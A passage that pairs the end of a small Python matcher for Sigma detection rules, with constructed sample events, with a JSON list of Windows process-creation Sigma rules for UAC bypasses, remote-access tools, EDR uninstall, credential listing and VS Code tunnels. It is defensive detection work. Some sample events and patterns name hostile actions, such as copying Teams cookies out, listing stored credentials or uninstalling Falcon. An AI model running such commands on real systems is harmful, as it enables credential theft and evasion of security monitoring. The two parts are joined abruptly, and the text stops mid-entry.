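        "selection_flags": {"CommandLine|contains|windash": "-m"},
        "selection_module": {"CommandLine|contains": "rdpcorets.dll"}}},
    "teams_sensitive_files": {"condition": "selection and not 1 of filter_main_*", "detection": {
        "selection": {"CommandLine|contains": ["\\Microsoft\\Teams\\Cookies", "\\Microsoft\\Teams\\Local Storage\\leveldb"]},
        "filter_main_legit_locations": {"Image|endswith": "\\Microsoft\\Teams\\current\\Teams.exe"}}},
    "sdclt_elevated": {"condition": "selection", "detection": {
        "selection": {"Image|endswith": "sdclt.exe", "IntegrityLevel": ["High", "S-1-16-12288"]}}},
    "trustedpath_mock_dir": {"condition": "selection", "detection": {
        "selection": {"Image|contains": ["C:\\Windows \\System32\\", "C:\\Windows \\SysWOW64\\"]}}},
}

def _variants(value, mods):
    # |windash: the author writes '-m'; also accept '/m' (and the reverse).
    vals = {str(value)}
    if "windash" in mods:
        vals |= {v.replace("-", "/") for v in vals} | {v.replace("/", "-") for v in vals}
    return vals

def _match_value(actual, pattern, mods):
    a, p = str(actual).lower(), str(pattern).lower()  # Sigma string matching is case-insensitive
    if "contains" in mods:
        return p in a
    if "endswith" in mods:
        return a.endswith(p)
    return fnmatch.fnmatchcase(a, p)  # unmodified value: exact match, '*' and '?' wildcards

def _match_field(event, key, patterns):
    field, *mods = key.split("|")
    if field not in event:  # a missing field never matches (matters for OriginalFileName)
        return False
    patterns = patterns if isinstance(patterns, list) else [patterns]
    hit = lambda pat: any(_match_value(event[field], v, mods) for v in _variants(pat, mods))
    return all(map(hit, patterns)) if "all" in mods else any(map(hit, patterns))

def _match_selection(event, sel):
    if isinstance(sel, list):  # list of maps: OR across the maps
        return any(_match_selection(event, s) for s in sel)
    return all(_match_field(event, k, v) for k, v in sel.items())  # map: AND across fields

def _eval_condition(cond, results):
    """Recursive descent: 'not' binds tighter than 'and', which binds tighter than 'or'."""
    toks, pos = re.findall(r"[\w*]+", cond), 0
    def take():
        nonlocal pos
        pos += 1
        return toks[pos - 1]
    def atom():
        t = take()
        if t == "not":
            return not atom()
        if t in ("1", "all") and pos < len(toks) and toks[pos] == "of":
            take()
            hits = [results[n] for n in fnmatch.filter(results, take())]  # names matching X*
            return all(hits) if t == "all" else any(hits)
        return results[t]
    def and_expr():
        v = atom()
        while pos < len(toks) and toks[pos] == "and":
            take(); v = atom() and v
        return v
    def expr():
        v = and_expr()
        while pos < len(toks) and toks[pos] == "or":
            take(); v = and_expr() or v
        return v
    return expr()

def matches(rule, event):
    results = {name: _match_selection(event, sel) for name, sel in rule["detection"].items()}
    return _eval_condition(rule["condition"], results)

def run(rules, events):
    """Rule name -> ids of the events it fires on."""
    return {n: [e["id"] for e in events if matches(r, e)] for n, r in rules.items()}

# Constructed sample events (Sysmon-style field names); not taken from a real host.
EVENTS = [
    {"id": 1, "Image": "C:\\Windows\\System32\\taskkill.exe", "CommandLine": "taskkill /F /IM ccSvcHst.exe"},
    {"id": 2, "Image": "C:\\Windows\\System32\\taskkill.exe", "CommandLine": "taskkill /IM ccSvcHst.exe /F"},  # ' /F ' needs a trailing space: missed
    {"id": 3, "Image": "C:\\Windows\\System32\\tasklist.exe", "OriginalFileName": "tasklist.exe",
     "CommandLine": "tasklist /M rdpcorets.dll"},  # '/M' matched through |windash
    {"id": 4, "Image": "C:\\Users\\a\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
     "CommandLine": "Teams.exe --db C:\\Users\\a\\AppData\\Roaming\\Microsoft\\Teams\\Local Storage\\leveldb"},  # filtered
    {"id": 5, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c cp C:\\Users\\a\\AppData\\Roaming\\Microsoft\\Teams\\Cookies C:\\Temp\\"},
    {"id": 6, "Image": "C:\\Windows\\System32\\sdclt.exe", "IntegrityLevel": "S-1-16-12288"},  # 'High' reported as a SID
    {"id": 7, "Image": "C:\\Windows \\System32\\winsat.exe", "IntegrityLevel": "High"},  # mock directory: trailing space
]
```

Calling `run(RULES, EVENTS)` fires taskkill_sep on event 1 only, tasklist_module_enum on 3, teams_sensitive_files on 5 (4 is removed by the filter), sdclt_elevated on 6 and trustedpath_mock_dir on 7. Event 2 is the caveat worth remembering when you write `contains|all` patterns padded with spaces: the order of flags on the real command line decides whether the padded token is present.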
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml",
    "content": "title: UAC Bypass Abusing Winsat Path Parsing - Process\nid: 7a01183d-71a2-46ad-ad5c-acd989ac1793\nstatus: test\ndescription: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n        ParentImage|endswith: '\\AppData\\Local\\Temp\\system32\\winsat.exe'\n        ParentCommandLine|contains: 'C:\\Windows \\system32\\winsat.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml",
    "content": "title: UAC Bypass Using Windows Media Player - Process\nid: 0058b9e5-bcd7-40d4-9205-95ca5a16d7b2\nstatus: test\ndescription: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img_1:\n        Image: 'C:\\Program Files\\Windows Media Player\\osk.exe'\n    selection_img_2:\n        Image: 'C:\\Windows\\System32\\cmd.exe'\n        ParentCommandLine: '\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s'\n    selection_integrity:\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: 1 of selection_img_* and selection_integrity\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml",
    "content": "title: Bypass UAC via WSReset.exe\nid: d797268e-28a9-49a7-b9a8-2f5039011c5c\nrelated:\n    - id: bdc8918e-a1d5-49d1-9db7-ea0fd91aa2ae\n      type: obsolete\nstatus: test\ndescription: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html\n    - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/\n    - https://www.activecyber.us/activelabs/windows-uac-bypass\n    - https://twitter.com/ReaQta/status/1222548288731217921\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth\ndate: 2019-10-24\nmodified: 2022-05-13\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\wsreset.exe'\n    filter:\n        - Image|endswith: '\\conhost.exe'\n        - OriginalFileName: 'CONHOST.EXE'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown sub processes of Wsreset.exe\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml",
    "content": "title: UAC Bypass WSReset\nid: 89a9a0e0-f61a-42e5-8957-b1479565a658\nstatus: test\ndescription: Detects the pattern of a UAC bypass via WSReset.exe; detectable with the default Sysmon config\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/\n    - https://github.com/hfiref0x/UACME\n    - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\wsreset.exe'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ultravnc.yml",
    "content": "title: Use of UltraVNC Remote Access Software\nid: 145322e4-0fd3-486b-81ca-9addc75736d8\nstatus: test\ndescription: An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md\nauthor: frack113\ndate: 2022-10-02\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: VNCViewer\n        - Product: UltraVNC VNCViewer\n        - Company: UltraVNC\n        - OriginalFileName: VNCViewer.exe\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml",
    "content": "title: Suspicious UltraVNC Execution\nid: 871b9555-69ca-4993-99d3-35a59f9f3599\nstatus: test\ndescription: Detects a suspicious UltraVNC command line flag combination that indicates an auto reconnect upon execution, e.g. at startup (as seen being used by the Gamaredon threat group)\nreferences:\n    - https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine\n    - https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution\n    - https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html\nauthor: Bhabesh Raj\ndate: 2022-03-04\nmodified: 2022-03-09\ntags:\n    - attack.lateral-movement\n    - attack.g0047\n    - attack.t1021.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '-autoreconnect '\n            - '-connect '\n            - '-id:'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml",
    "content": "title: Uninstall Crowdstrike Falcon Sensor\nid: f0f7be61-9cf5-43be-9836-99d6ef448a18\nstatus: test\ndescription: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: frack113\ndate: 2021-07-12\nmodified: 2023-03-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\WindowsSensor.exe'\n            - ' /uninstall'\n            - ' /quiet'\n    condition: selection\nfalsepositives:\n    - Administrators might leverage the same command line for debugging or other purposes. However, this action must always be investigated\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification.yml",
    "content": "title: User Shell Folders Registry Modification via CommandLine\nid: 8f3ab69a-aa22-4943-aa58-e0a52fdf6818\nrelated:\n    - id: 9c226817-8dc9-46c2-a58d-66655aafd7dc\n      type: similar\nstatus: experimental\ndescription: |\n    Detects modifications to User Shell Folders registry values via reg.exe or PowerShell, which could indicate persistence attempts.\n    Attackers may modify User Shell Folders registry values to point to malicious executables or scripts that will be executed during startup.\n    This technique is often used to maintain persistence on a compromised system by ensuring that malicious payloads are executed automatically.\nreferences:\n    - https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1547.001\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\reg.exe'\n        - OriginalFileName:\n              - 'powershell.exe'\n              - 'pwsh.dll'\n              - 'reg.exe'\n    selection_cli_action:\n        CommandLine|contains:\n            - ' add ' # reg.exe modification\n            - 'New-ItemProperty'\n            - 'Set-ItemProperty'\n            - 'si ' # short for Set-ItemProperty\n    selection_cli_paths_root:\n        CommandLine|contains:\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders'\n    selection_cli_paths_suffix:\n        CommandLine|contains: 'Startup' # covers both 'Startup' and 'Common Startup'\n    condition: all of selection_*\nfalsepositives:\n    - Usage of reg.exe or PowerShell to modify User Shell Folders for legitimate purposes, but rare.\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n      technique: T1547.001\n      atomic_guid: acfef903-7662-447e-a391-9c91c2f00f7b\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml",
    "content": "title: Uncommon Userinit Child Process\nid: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458\nrelated:\n    - id: 21d856f9-9281-4ded-9377-51a1a6e2a432\n      type: similar\nstatus: test\ndescription: Detects uncommon \"userinit.exe\" child processes, which could be a sign of uncommon shells or login scripts used for persistence.\nreferences:\n    - https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\n    - https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core\nauthor: Tom Ueltschi (@c_APT_ure), Tim Shelton\ndate: 2019-01-12\nmodified: 2023-11-14\ntags:\n    - attack.privilege-escalation\n    - attack.t1037.001\n    - attack.persistence\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\userinit.exe'\n    filter_main_explorer:\n        Image|endswith: ':\\WINDOWS\\explorer.exe'\n    filter_optional_logonscripts:\n        CommandLine|contains:\n            - 'netlogon.bat'\n            - 'UsrLogon.cmd'\n    filter_optional_windows_core:\n        # Note: This filter is mandatory on Windows Core machines as the default shell spawned by \"userinit\" is \"powershell.exe\".\n        # https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core\n        CommandLine: 'PowerShell.exe'\n    filter_optional_proquota:\n        Image|endswith:\n            - ':\\Windows\\System32\\proquota.exe'\n            - ':\\Windows\\SysWOW64\\proquota.exe'\n    filter_optional_citrix:\n        Image|endswith:\n            # As reported by https://github.com/SigmaHQ/sigma/issues/4569\n            - ':\\Program Files (x86)\\Citrix\\HDX\\bin\\cmstart.exe' # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command\n            - ':\\Program Files (x86)\\Citrix\\HDX\\bin\\icast.exe' # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command\n            - ':\\Program Files (x86)\\Citrix\\System32\\icast.exe'\n            - ':\\Program Files\\Citrix\\HDX\\bin\\cmstart.exe' # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command\n            - ':\\Program Files\\Citrix\\HDX\\bin\\icast.exe' # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command\n            - ':\\Program Files\\Citrix\\System32\\icast.exe'\n    filter_optional_image_null:\n        Image: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vaultcmd_list_creds.yml",
    "content": "title: Windows Credential Manager Access via VaultCmd\nid: 58f50261-c53b-4c88-bd12-1d71f12eda4c\nstatus: test\ndescription: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd\nauthor: frack113\ndate: 2022-04-08\nmodified: 2022-05-13\ntags:\n    - attack.credential-access\n    - attack.t1555.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\VaultCmd.exe'\n        - OriginalFileName: 'VAULTCMD.EXE'\n    selection_cli:\n        CommandLine|contains: '/listcreds:'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vbscript_registry_modification.yml",
    "content": "title: Registry Modification Attempt Via VBScript\nid: 921aa10f-2e74-4cca-9498-98f9ca4d6fdf\nrelated:\n    - id: 2a0a169d-cc66-43ce-9ae2-6e678e54e46a\n      type: similar\n    - id: 7f4c43f9-b1a5-4c7d-b24a-b41bf3a3ebf2\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to modify the registry using VBScript's CreateObject(\"Wscript.shell\") and RegWrite methods via common LOLBINs.\n    It could be an attempt to modify the registry for persistence without using straightforward methods like regedit.exe, reg.exe, or PowerShell.\n    Threat Actors may use this technique to evade detection by security solutions that monitor for direct registry modifications through traditional tools.\nreferences:\n    - https://www.linkedin.com/posts/mauricefielenbach_livingofftheland-redteam-persistence-activity-7344801774182051843-TE00/\n    - https://www.nextron-systems.com/2025/07/29/detecting-the-most-popular-mitre-persistence-method-registry-run-keys-startup-folder/\ndate: 2025-08-13\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.execution\n    - attack.t1112\n    - attack.t1059.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'CreateObject'\n            - 'Wscript.shell'\n            - '.RegWrite'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml",
    "content": "title: Verclsid.exe Runs COM Object\nid: d06be4b9-8045-428b-a567-740a26d9db25\nstatus: test\ndescription: Detects when verclsid.exe is used to run a COM object via its GUID\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Verclsid/\n    - https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5\n    - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/\nauthor: Victor Sergeev, oscd.community\ndate: 2020-10-09\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\verclsid.exe'\n        - OriginalFileName: 'verclsid.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/S'\n            - '/C'\n    filter_main_runtimebroker:\n        ParentImage|endswith: 'C:\\Windows\\System32\\RuntimeBroker.exe'\n        CommandLine|contains|all:\n            - 'verclsid.exe\" /S /C {'\n            - '} /I {'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_virtualbox_execution.yml",
    "content": "title: Virtualbox Driver Installation or Starting of VMs\nid: bab049ca-7471-4828-9024-38279a4c04da\nstatus: test\ndescription: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.\nreferences:\n    - https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/\n    - https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/\nauthor: Janantha Marasinghe\ndate: 2020-09-26\nmodified: 2025-07-29\ntags:\n    - attack.defense-evasion\n    - attack.t1564.006\n    - attack.t1564\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains:\n            - 'VBoxRT.dll,RTR3Init'\n            - 'VBoxC.dll'\n            - 'VBoxDrv.sys'\n    selection_2:\n        CommandLine|contains:\n            - 'startvm'\n            - 'controlvm'\n    condition: 1 of selection_*\nfalsepositives:\n    - This may have false positives on hosts where Virtualbox is legitimately being used for operations\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml",
    "content": "title: Suspicious VBoxDrvInst.exe Parameters\nid: b7b19cb6-9b32-4fc4-a108-73f19acfe262\nstatus: test\ndescription: |\n  Detects VBoxDrvInst.exe run with parameters that allow processing an INF file.\n  This allows one to create values in the registry and install drivers.\n  For example, one could use this technique to obtain persistence by modifying one of the Run or RunOnce registry keys\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml\n    - https://twitter.com/pabraeken/status/993497996179492864\nauthor: Konstantin Grishchenko, oscd.community\ndate: 2020-10-06\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\VBoxDrvInst.exe'\n        CommandLine|contains|all:\n            - 'driver'\n            - 'executeinf'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the VBoxDrvInst.exe utility by the VirtualBox Guest Additions installation process\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml",
    "content": "title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script\nid: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d\nrelated:\n    - id: 236d8e89-ed95-4789-a982-36f4643738ba\n      type: derived\nstatus: test\ndescription: Detects execution of \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flags to set up a specific script to run for a specific VM state\nreferences:\n    - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/\n    - https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-14\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\VMwareToolBoxCmd.exe'\n        - OriginalFileName: 'toolbox-cmd.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' script '\n            - ' set '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml",
    "content": "title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script\nid: 236d8e89-ed95-4789-a982-36f4643738ba\nrelated:\n    - id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d\n      type: derived\nstatus: test\ndescription: Detects execution of \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flags to set up a specific script that is located in a potentially suspicious location to run for a specific VM state\nreferences:\n    - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-14\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_bin_img:\n        - Image|endswith: '\\VMwareToolBoxCmd.exe'\n        - OriginalFileName: 'toolbox-cmd.exe'\n    selection_bin_cli:\n        CommandLine|contains|all:\n            - ' script '\n            - ' set '\n    selection_susp_paths:\n        CommandLine|contains:\n            - ':\\PerfLogs\\'\n            - ':\\Temp\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml",
    "content": "title: VMToolsd Suspicious Child Process\nid: 5687f942-867b-4578-ade7-1e341c46e99a\nstatus: test\ndescription: Detects suspicious child process creations of the VMware Tools process, which may indicate persistence setup\nreferences:\n    - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/\n    - https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png\n    - https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf\nauthor: bohops, Bhabesh Raj\ndate: 2021-10-08\nmodified: 2023-07-25\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\vmtoolsd.exe'\n    selection_img:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'cscript.exe'\n              - 'MSHTA.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'REGSVR32.EXE'\n              - 'RUNDLL32.EXE'\n              - 'wscript.exe'\n    filter_main_vmwaretools_script:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains:\n            - '\\VMware\\VMware Tools\\poweron-vm-default.bat'\n            - '\\VMware\\VMware Tools\\poweroff-vm-default.bat'\n            - '\\VMware\\VMware Tools\\resume-vm-default.bat'\n            - '\\VMware\\VMware Tools\\suspend-vm-default.bat'\n    filter_main_empty:\n        Image|endswith: '\\cmd.exe'\n        CommandLine: ''\n    filter_main_null:\n        Image|endswith: '\\cmd.exe'\n        CommandLine: null\n    condition: all of selection* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate use by VM administrator\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml",
    "content": "title: Potentially Suspicious Child Process Of VsCode\nid: 5a3164f2-b373-4152-93cf-090b13c12d27\nstatus: test\ndescription: Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt at persistence via VsCode tasks or terminal profiles.\nreferences:\n    - https://twitter.com/nas_bench/status/1618021838407495681\n    - https://twitter.com/nas_bench/status/1618021415852335105\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-26\nmodified: 2023-10-25\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\code.exe'\n    selection_children_images:\n        Image|endswith:\n            - '\\calc.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n    selection_children_cli:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\cmd.exe'\n        CommandLine|contains:\n            - 'Invoke-Expressions'\n            - 'IEX'\n            - 'Invoke-Command'\n            - 'ICM'\n            - 'DownloadString'\n            - 'rundll32'\n            - 'regsvr32'\n            - 'wscript'\n            - 'cscript'\n    selection_children_paths:\n        Image|contains:\n            # Add more suspicious locations\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - ':\\Temp\\'\n    condition: selection_parent and 1 of selection_children_*\nfalsepositives:\n    - In development environments where VsCode is used heavily, false positives may occur when developers use tasks to compile or execute different types of code. Remove or add processes accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_execution.yml",
    "content": "title: Visual Studio Code Tunnel Execution\nid: 90d6bd71-dffb-4989-8d86-a827fedd6624\nstatus: test\ndescription: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\n    - https://code.visualstudio.com/docs/remote/tunnels\nauthor: Nasreddine Bencherchali (Nextron Systems), citron_ninja\ndate: 2023-10-25\nmodified: 2025-10-29\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1219\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_only_tunnel:\n        OriginalFileName: null\n        CommandLine|endswith: '.exe tunnel'\n    selection_tunnel_args:\n        CommandLine|contains|all:\n            - '.exe tunnel'\n            - '--accept-server-license-terms'\n    selection_parent_tunnel:\n        ParentCommandLine|endswith: ' tunnel'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains|all:\n            - '/d /c '\n            - '\\servers\\Stable-'\n            - 'code-server.cmd'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use of Visual Studio Code tunnel\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml",
